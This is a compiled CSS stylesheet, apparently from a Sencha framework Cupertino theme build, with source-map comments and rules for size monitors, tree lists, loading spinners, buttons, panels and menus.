.x-size-monitors > * {
width: 100%;
height: 100%;
overflow: hidden;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:25 */
.x-size-monitors.scroll > *.shrink::after {
content: '';
display: block;
width: 200%;
height: 200%;
min-width: 1px;
min-height: 1px;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:34 */
.x-size-monitors.scroll > *.expand::after {
content: '';
display: block;
width: 100000px;
height: 100000px;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:44 */
.x-size-monitors.overflowchanged > *.shrink > * {
width: 100%;
height: 100%;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:51 */
.x-size-monitors.overflowchanged > *.expand > * {
width: 200%;
height: 200%;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:59 */
.x-size-change-detector {
visibility: hidden;
position: absolute;
left: 0;
top: 0;
z-index: -1;
width: 100%;
height: 100%;
overflow: hidden;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:70 */
.x-size-change-detector > * {
visibility: hidden;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:74 */
.x-size-change-detector-shrink > * {
width: 200%;
height: 200%;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:79 */
.x-size-change-detector-expand > * {
width: 100000px;
height: 100000px;
}
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:5 */
@-webkit-keyframes x-paint-monitor-helper {
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:6 */
from {
zoom: 1;
}
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:9 */
to {
zoom: 1;
}
}
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:14 */
@keyframes x-paint-monitor-helper {
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:15 */
from {
zoom: 1;
}
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:18 */
to {
zoom: 1;
}
}
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:23 */
.x-paint-monitored {
position: relative;
}
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:27 */
.x-paint-monitor {
width: 0 !important;
height: 0 !important;
visibility: hidden;
}
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:32 */
.x-paint-monitor.cssanimation {
-webkit-animation-duration: 0.0001ms;
-webkit-animation-name: x-paint-monitor-helper;
animation-duration: 0.0001ms;
animation-name: x-paint-monitor-helper;
}
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:39 */
.x-paint-monitor.overflowchange {
overflow: hidden;
}
/* http://localhost:1843/packages/core/sass/src/util/PaintMonitor.scss:42 */
.x-paint-monitor.overflowchange::after {
content: '';
display: block;
width: 1px !important;
height: 1px !important;
}
/* http://localhost:1843/packages/core/sass/src/util/Translatable.scss:5 */
.x-translatable {
position: absolute !important;
top: 500000px !important;
left: 500000px !important;
overflow: visible !important;
z-index: 1;
}
/* http://localhost:1843/packages/core/sass/src/util/Translatable.scss:13 */
.x-translatable-hboxfix {
position: absolute;
min-width: 100%;
top: 0;
left: 0;
}
/* http://localhost:1843/packages/core/sass/src/util/Translatable.scss:19 */
.x-translatable-hboxfix > .x-translatable {
position: relative !important;
}
/* http://localhost:1843/packages/core/sass/src/util/Translatable.scss:24 */
.x-translatable-container {
overflow: hidden;
width: auto;
height: auto;
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
}
/* http://localhost:1843/packages/core/sass/src/util/Translatable.scss:34 */
.x-translatable-container::before {
content: '';
display: block;
width: 1000000px;
height: 1000000px;
visibility: hidden;
}
/* http://localhost:1843/packages/core/sass/src/scroll/DomScroller.scss:1 */
.x-domscroller-spacer {
position: absolute;
height: 1px;
width: 1px;
font-size: 0;
line-height: 0;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:531 */
.x-treelist {
background-position-x: 22px;
overflow: hidden;
padding: 0 0 0 0;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:543 */
.x-treelist-container,
.x-treelist-root-container {
width: 100%;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:548 */
.x-treelist-toolstrip {
display: none;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:553 */
.x-treelist-micro > .x-treelist-toolstrip {
display: inline-block;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:556 */
.x-treelist-micro > .x-treelist-root-container {
display: none;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:561 */
.x-treelist-item,
.x-treelist-container,
.x-treelist-root-container {
overflow: hidden;
list-style: none;
padding: 0;
margin: 0;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:570 */
.x-treelist-item-tool,
.x-treelist-row,
.x-treelist-item-wrap {
position: relative;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:576 */
.x-treelist-item-icon,
.x-treelist-item-expander {
display: none;
position: absolute;
top: 0;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:583 */
.x-treelist-item-expander {
right: 0;
cursor: pointer;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:588 */
.x-treelist-expander-only .x-treelist-item-expandable > * > .x-treelist-item-wrap > * {
cursor: pointer;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:592 */
.x-treelist-item-text {
cursor: default;
white-space: nowrap;
overflow: hidden;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:598 */
.x-treelist-item-collapsed > .x-treelist-container {
display: none;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:602 */
.x-treelist-item-expandable > * > * > .x-treelist-item-expander,
.x-treelist-item-icon {
display: block;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:607 */
.x-treelist-item-floated > * > * > .x-treelist-item-expander,
.x-treelist-item-floated > * > * > .x-treelist-item-icon {
display: none;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:612 */
.x-treelist-expander-first .x-treelist-item-expander {
left: 0;
right: auto;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:94 */
.x-treelist-toolstrip {
background-color: #f8f8f8;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:134 */
.x-treelist-item-tool {
padding-left: 8px;
padding-right: 8px;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:157 */
.x-treelist-item-icon,
.x-treelist-item-tool,
.x-treelist-item-expander {
line-height: 36px;
text-align: center;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:170 */
.x-treelist-item-icon,
.x-treelist-item-tool {
font-size: 18px;
width: 22px;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:183 */
.x-treelist-item-tool {
width: 38px;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:193 */
.x-treelist-item-expander {
font-size: 16px;
width: 18px;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:209 */
.x-treelist-item-expander:after {
content: "\f105";
font-family: FontAwesome;
line-height: 1;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:213 */
.x-treelist-item-expanded > * > * > .x-treelist-item-expander:after {
content: "\f107";
font-family: FontAwesome;
line-height: 1;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:222 */
.x-treelist-item-text {
margin-left: 26px;
margin-right: 18px;
line-height: 36px;
text-overflow: ellipsis;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:238 */
.x-treelist-row {
padding-left: 8px;
padding-right: 8px;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:269 */
.x-treelist-item-floated .x-treelist-container {
width: auto;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:272 */
.x-treelist-item-floated > .x-treelist-row {
background-color: #f8f8f8;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:276 */
.x-treelist-item-floated > .x-treelist-container {
margin-left: -22px;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:279 */
.x-big .x-treelist-item-floated > .x-treelist-container {
margin-left: 0;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:285 */
.x-treelist-item-floated > * > * > .x-treelist-item-text {
margin-left: 0;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:289 */
.x-treelist-item-floated > * .x-treelist-row {
padding-left: 0;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:293 */
.x-treelist-item-floated .x-treelist-row:before {
width: 0;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:297 */
.x-treelist-item-floated > .x-treelist-row:hover {
background-color: #f8f8f8;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:313 */
.x-treelist-item-expanded > .x-treelist-item-expander:after {
content: "\f107";
font-family: FontAwesome;
line-height: 1;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:318 */
.x-treelist-item-collapsed > * > .x-treelist-item-expander:after {
content: "\f105";
font-family: FontAwesome;
line-height: 1;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:324 */
&.x-treelist-highlight-path .x-treelist-item:hover > * > .x-treelist-item-icon {
transition: color 0.5s;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:328 */
&.x-treelist-highlight-path .x-treelist-item:hover > * > .x-treelist-item-text {
transition: color 0.5s;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:332 */
&.x-treelist-highlight-path .x-treelist-item:hover > * > .x-treelist-item-expander {
transition: color 0.5s;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:342 */
.x-treelist-row:hover > * > .x-treelist-item-icon {
transition: color 0.5s;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:346 */
.x-treelist-row:hover > * > .x-treelist-item-text {
transition: color 0.5s;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:350 */
.x-treelist-row:hover > * > .x-treelist-item-expander {
transition: color 0.5s;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:357 */
.x-treelist-expander-first .x-treelist-item-icon {
left: 18px;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:366 */
.x-treelist-expander-first .x-treelist-item-text {
margin-left: 44px;
margin-right: 0;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:376 */
.x-treelist-expander-first .x-treelist-item-hide-icon > * > * > .x-treelist-item-text {
margin-left: 22px;
}
/* http://localhost:1843/packages/core/sass/src/list/TreeItem.scss:386 */
.x-treelist-item-hide-icon > * > * > .x-treelist-item-text {
margin-left: 4px;
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:329 */
@font-face {
font-family: 'iOS7';
src: url("fonts/ios7/ios7.eot");
src: url("fonts/ios7/ios7.eot?#iefix") format('embedded-opentype'), url("fonts/ios7/ios7.woff") format('woff'), url("fonts/ios7/ios7.ttf") format('truetype');
font-weight: normal;
font-style: normal;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Component.scss:3 */
.x-layout-card-item {
background: #fff;
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:261 */
.x-loading-spinner {
font-size: 250%;
height: 1em;
width: 1em;
position: relative;
-webkit-transform-origin: 0.5em 0.5em;
transform-origin: 0.5em 0.5em;
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:271 */
.x-loading-spinner > span,
.x-loading-spinner > span:before,
.x-loading-spinner > span:after {
display: block;
position: absolute;
width: .1em;
height: .25em;
top: 0;
-webkit-transform-origin: 0.05em 0.5em;
transform-origin: 0.05em 0.5em;
content: " ";
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:284 */
.x-loading-spinner > span {
left: 50%;
margin-left: -0.05em;
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:288 */
.x-loading-spinner > span.x-loading-top {
background-color: rgba(21, 126, 251, 0.99);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:289 */
.x-loading-spinner > span.x-loading-top::after {
background-color: rgba(21, 126, 251, 0.9);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:290 */
.x-loading-spinner > span.x-loading-left::before {
background-color: rgba(21, 126, 251, 0.8);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:291 */
.x-loading-spinner > span.x-loading-left {
background-color: rgba(21, 126, 251, 0.7);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:292 */
.x-loading-spinner > span.x-loading-left::after {
background-color: rgba(21, 126, 251, 0.6);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:293 */
.x-loading-spinner > span.x-loading-bottom::before {
background-color: rgba(21, 126, 251, 0.5);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:294 */
.x-loading-spinner > span.x-loading-bottom {
background-color: rgba(21, 126, 251, 0.4);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:295 */
.x-loading-spinner > span.x-loading-bottom::after {
background-color: rgba(21, 126, 251, 0.35);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:296 */
.x-loading-spinner > span.x-loading-right::before {
background-color: rgba(21, 126, 251, 0.3);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:297 */
.x-loading-spinner > span.x-loading-right {
background-color: rgba(21, 126, 251, 0.25);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:298 */
.x-loading-spinner > span.x-loading-right::after {
background-color: rgba(21, 126, 251, 0.2);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:299 */
.x-loading-spinner > span.x-loading-top::before {
background-color: rgba(21, 126, 251, 0.15);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:304 */
.x-loading-spinner > span.x-loading-top {
-webkit-transform: rotate(0deg);
-moz-transform: rotate(0deg);
-ms-transform: rotate(0deg);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:305 */
.x-loading-spinner > span.x-loading-right {
-webkit-transform: rotate(90deg);
-moz-transform: rotate(90deg);
-ms-transform: rotate(90deg);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:306 */
.x-loading-spinner > span.x-loading-bottom {
-webkit-transform: rotate(180deg);
-moz-transform: rotate(180deg);
-ms-transform: rotate(180deg);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:307 */
.x-loading-spinner > span.x-loading-left {
-webkit-transform: rotate(270deg);
-moz-transform: rotate(270deg);
-ms-transform: rotate(270deg);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:310 */
.x-loading-spinner > span::before {
-webkit-transform: rotate(30deg);
-moz-transform: rotate(30deg);
-ms-transform: rotate(30deg);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:311 */
.x-loading-spinner > span::after {
-webkit-transform: rotate(-30deg);
-moz-transform: rotate(-30deg);
-ms-transform: rotate(-30deg);
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins.scss:314 */
.x-loading-spinner {
-webkit-animation-name: x-loading-spinner-rotate;
-webkit-animation-duration: .5s;
-webkit-animation-iteration-count: infinite;
-webkit-animation-timing-function: linear;
animation-name: x-loading-spinner-rotate;
animation-duration: .5s;
animation-timing-function: linear;
animation-iteration-count: infinite;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Mask.scss:1 */
.x-mask .x-mask-inner {
position: relative;
background: #fff;
color: #157efb;
text-align: center;
padding: .4em;
font-size: .95em;
font-weight: 400;
-webkit-border-radius: 7px;
-moz-border-radius: 7px;
-ms-border-radius: 7px;
-o-border-radius: 7px;
border-radius: 7px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Mask.scss:11 */
.x-mask .x-mask-inner .x-mask-message {
color: #157efb;
bottom: 15px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Mask.scss:16 */
.x-mask .x-mask-inner .x-loading-spinner > span {
margin-left: -.065em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Panel.scss:5 */
.x-panel.x-floating,
.x-form.x-floating {
padding: 0;
-webkit-border-radius: 6px;
-moz-border-radius: 6px;
-ms-border-radius: 6px;
-o-border-radius: 6px;
border-radius: 6px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Panel.scss:11 */
.x-panel.x-floating > .x-dock.x-sized,
.x-form.x-floating > .x-dock.x-sized {
margin: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Panel.scss:16 */
.x-toolbar.x-docked-top {
-moz-border-radius-topleft: 6px;
-webkit-border-top-left-radius: 6px;
border-top-left-radius: 6px;
-moz-border-radius-topright: 6px;
-webkit-border-top-right-radius: 6px;
border-top-right-radius: 6px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Panel.scss:20 */
.x-container.x-floating > .x-dock > .x-toolbar.x-docked-bottom,
.x-panel.x-floating > .x-dock > .x-toolbar.x-docked-bottom {
-moz-border-radius-bottomleft: 6px;
-webkit-border-bottom-left-radius: 6px;
border-bottom-left-radius: 6px;
-moz-border-radius-bottomright: 6px;
-webkit-border-bottom-right-radius: 6px;
border-bottom-right-radius: 6px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Panel.scss:28 */
.x-webkit .x-anchor {
position: absolute;
overflow: hidden;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Panel.scss:32 */
.x-webkit .x-anchor.x-anchor-top {
margin-top: -0.68em;
margin-left: -0.8155em;
width: 1.631em;
height: .7em;
-webkit-mask: 0 0 url(images/tip_top.png) no-repeat;
-webkit-mask-size: 1.631em .7em;
background-color: white;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Panel.scss:42 */
.x-webkit .x-anchor.x-anchor-bottom {
margin-left: -0.8155em;
width: 1.631em;
height: .7em;
-webkit-mask: 0 0 url(images/tip_bottom.png) no-repeat;
-webkit-mask-size: 1.631em .7em;
background-color: white;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Panel.scss:51 */
.x-webkit .x-anchor.x-anchor-left {
margin-left: -0.6655em;
margin-top: -0.35em;
height: 1.631em;
width: .7em;
-webkit-mask: 0 0 url(images/tip_left.png) no-repeat;
-webkit-mask-size: .7em 1.631em;
background-color: white;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Panel.scss:61 */
.x-webkit .x-anchor.x-anchor-right {
margin-top: -0.35em;
height: 1.631em;
width: .7em;
-webkit-mask: 0 0 url(images/tip_right.png) no-repeat;
-webkit-mask-size: .7em 1.631em;
background-color: white;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:1 */
.x-button {
height: 2.1em;
padding: 0 8px;
-webkit-border-radius: 6px;
-moz-border-radius: 6px;
-ms-border-radius: 6px;
-o-border-radius: 6px;
border-radius: 6px;
background-color: #fff;
border-color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:9 */
.x-button-icon {
width: 1.5em;
height: 1.5em;
color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:14 */
.x-button-icon:before {
font-size: 1.4em;
line-height: 1.15em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:21 */
.x-button-pressing .x-button-icon {
color: #abd1fe;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:26 */
.x-button-label,
.x-badge {
font-weight: 400;
font-family: "Helvetica Neue", Helvetica, Arial;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:33 */
.x-button-round,
.x-button-decline-round,
.x-button-confirm-round {
-webkit-border-radius: 1.8em;
-moz-border-radius: 1.8em;
-ms-border-radius: 1.8em;
-o-border-radius: 1.8em;
border-radius: 1.8em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:39 */
.x-button-small,
.x-button-decline-small,
.x-button-confirm-small {
height: 1.4em;
padding: 0 5px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:45 */
.x-button-small .x-button-label,
.x-button-small .x-badge,
.x-button-decline-small .x-button-label,
.x-button-decline-small .x-badge,
.x-button-confirm-small .x-button-label,
.x-button-confirm-small .x-badge {
font-size: 1em;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:50 */
.x-button,
.x-button-round,
.x-button-small,
.x-button-forward {
border-color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:56 */
.x-button .x-button-label,
.x-button .x-badge,
.x-button-round .x-button-label,
.x-button-round .x-badge,
.x-button-small .x-button-label,
.x-button-small .x-badge,
.x-button-forward .x-button-label,
.x-button-forward .x-badge {
color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:60 */
.x-button.x-button-pressing,
.x-button.x-button-pressed,
.x-button-round.x-button-pressing,
.x-button-round.x-button-pressed,
.x-button-small.x-button-pressing,
.x-button-small.x-button-pressed,
.x-button-forward.x-button-pressing,
.x-button-forward.x-button-pressed {
border-color: #abd1fe;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:64 */
.x-button.x-button-pressing .x-button-label,
.x-button.x-button-pressing .x-badge,
.x-button.x-button-pressed .x-button-label,
.x-button.x-button-pressed .x-badge,
.x-button-round.x-button-pressing .x-button-label,
.x-button-round.x-button-pressing .x-badge,
.x-button-round.x-button-pressed .x-button-label,
.x-button-round.x-button-pressed .x-badge,
.x-button-small.x-button-pressing .x-button-label,
.x-button-small.x-button-pressing .x-badge,
.x-button-small.x-button-pressed .x-button-label,
.x-button-small.x-button-pressed .x-badge,
.x-button-forward.x-button-pressing .x-button-label,
.x-button-forward.x-button-pressing .x-badge,
.x-button-forward.x-button-pressed .x-button-label,
.x-button-forward.x-button-pressed .x-badge {
color: #abd1fe;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:70 */
.x-button-decline,
.x-button-decline-round,
.x-button-decline-small {
border-color: #fc3e39;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:75 */
.x-button-decline .x-button-label,
.x-button-decline .x-badge,
.x-button-decline-round .x-button-label,
.x-button-decline-round .x-badge,
.x-button-decline-small .x-button-label,
.x-button-decline-small .x-badge {
color: #fc3e39;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:79 */
.x-button-decline.x-button-pressing,
.x-button-decline.x-button-pressed,
.x-button-decline-round.x-button-pressing,
.x-button-decline-round.x-button-pressed,
.x-button-decline-small.x-button-pressing,
.x-button-decline-small.x-button-pressed {
border-color: #fed1d0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:83 */
.x-button-decline.x-button-pressing .x-button-label,
.x-button-decline.x-button-pressing .x-badge,
.x-button-decline.x-button-pressed .x-button-label,
.x-button-decline.x-button-pressed .x-badge,
.x-button-decline-round.x-button-pressing .x-button-label,
.x-button-decline-round.x-button-pressing .x-badge,
.x-button-decline-round.x-button-pressed .x-button-label,
.x-button-decline-round.x-button-pressed .x-badge,
.x-button-decline-small.x-button-pressing .x-button-label,
.x-button-decline-small.x-button-pressing .x-badge,
.x-button-decline-small.x-button-pressed .x-button-label,
.x-button-decline-small.x-button-pressed .x-badge {
color: #fed1d0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:89 */
.x-button-confirm,
.x-button-confirm-round,
.x-button-confirm-small {
border-color: #53d769;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:94 */
.x-button-confirm .x-button-label,
.x-button-confirm .x-badge,
.x-button-confirm-round .x-button-label,
.x-button-confirm-round .x-badge,
.x-button-confirm-small .x-button-label,
.x-button-confirm-small .x-badge {
color: #53d769;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:98 */
.x-button-confirm.x-button-pressing,
.x-button-confirm.x-button-pressed,
.x-button-confirm-round.x-button-pressing,
.x-button-confirm-round.x-button-pressed,
.x-button-confirm-small.x-button-pressing,
.x-button-confirm-small.x-button-pressed {
border-color: #cff4d5;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:102 */
.x-button-confirm.x-button-pressing .x-button-label,
.x-button-confirm.x-button-pressing .x-badge,
.x-button-confirm.x-button-pressed .x-button-label,
.x-button-confirm.x-button-pressed .x-badge,
.x-button-confirm-round.x-button-pressing .x-button-label,
.x-button-confirm-round.x-button-pressing .x-badge,
.x-button-confirm-round.x-button-pressed .x-button-label,
.x-button-confirm-round.x-button-pressed .x-badge,
.x-button-confirm-small.x-button-pressing .x-button-label,
.x-button-confirm-small.x-button-pressing .x-badge,
.x-button-confirm-small.x-button-pressed .x-button-label,
.x-button-confirm-small.x-button-pressed .x-badge {
color: #cff4d5;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:109 */
.x-button.x-button-action,
.x-button.x-button-action-round,
.x-button.x-button-action-small {
border-color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:114 */
.x-button.x-button-action .x-button-label,
.x-button.x-button-action .x-badge,
.x-button.x-button-action-round .x-button-label,
.x-button.x-button-action-round .x-badge,
.x-button.x-button-action-small .x-button-label,
.x-button.x-button-action-small .x-badge {
color: #157efb;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:118 */
.x-button.x-button-action.x-button-pressing,
.x-button.x-button-action-round.x-button-pressing,
.x-button.x-button-action-small.x-button-pressing {
border-color: #abd1fe;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:121 */
.x-button.x-button-action.x-button-pressing .x-button-label,
.x-button.x-button-action.x-button-pressing .x-badge,
.x-button.x-button-action-round.x-button-pressing .x-button-label,
.x-button.x-button-action-round.x-button-pressing .x-badge,
.x-button.x-button-action-small.x-button-pressing .x-button-label,
.x-button.x-button-action-small.x-button-pressing .x-badge {
color: #abd1fe;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:128 */
.x-button.x-button-back {
border: 0px;
color: #157efb;
background-color: transparent;
margin: 0px;
padding: 0px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:135 */
.x-button.x-button-back:before {
content: '"';
font-family: 'iOS7';
color: #157efb;
font-size: 1.3em;
text-align: center;
background-color: transparent;
line-height: 1.3em;
padding-left: 0px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:146 */
.x-button.x-button-back .x-button-label,
.x-button.x-button-back .x-badge {
font-size: 1.1em;
line-height: 1.3em;
font-weight: 300;
padding-left: 2px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:153 */
.x-button.x-button-back.x-button-pressing {
color: #abd1fe;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:156 */
.x-button.x-button-back.x-button-pressing:before {
color: #abd1fe;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:160 */
.x-button.x-button-back.x-button-pressing .x-button-label,
.x-button.x-button-back.x-button-pressing .x-badge {
color: #abd1fe;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:168 */
.x-hasbadge {
overflow: visible;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Button.scss:171 */
.x-hasbadge .x-badge {
top: -5px;
right: -6px;
max-width: 55%;
white-space: nowrap;
text-overflow: ellipsis;
text-align: center;
display: block;
overflow: hidden;
color: #fff !important;
min-width: 18px;
font-weight: bold;
text-shadow: 0 0 0 !important;
font-family: "Helvetica Neue", Helvetica, Arial;
font-size: 10px !important;
padding: 1px 2px 2px;
border: 0px;
-webkit-border-radius: 26px;
-moz-border-radius: 26px;
-ms-border-radius: 26px;
-o-border-radius: 26px;
border-radius: 26px;
background-color: #fc3e39;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Sheet.scss:1 */
.x-sheet-action {
padding: 15px;
border-top: 1px solid #ccc;
-webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.3);
-moz-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.3);
box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.3);
background-color: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Sheet.scss:7 */
.x-sheet-action .x-button {
margin-bottom: 7px;
-webkit-border-radius: 6px;
-moz-border-radius: 6px;
-ms-border-radius: 6px;
-o-border-radius: 6px;
border-radius: 6px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Sheet.scss:11 */
.x-sheet-action .x-button:last-child {
margin-bottom: 0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Menu.scss:1 */
.x-ios-7.x-standalone .x-menu {
padding-top: 35px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Menu.scss:5 */
.x-menu {
padding: 15px;
border: 1px solid #ccc;
border-width: 0;
-webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.3);
-moz-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.3);
box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.3);
background-color: #fff;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Menu.scss:12 */
.x-menu .x-button {
margin-bottom: 7px;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Menu.scss:15 */
.x-menu .x-button:before {
content: '';
display: block;
position: absolute;
bottom: -1px;
left: 1em;
right: 0px;
border-type: solid;
border-color: #dbdbe0;
}
/* http://localhost:1843/modern/theme-cupertino/sass/src/Menu.scss:26 */
.x-menu .x-button:last-child {
margin-bottom: 0;
}
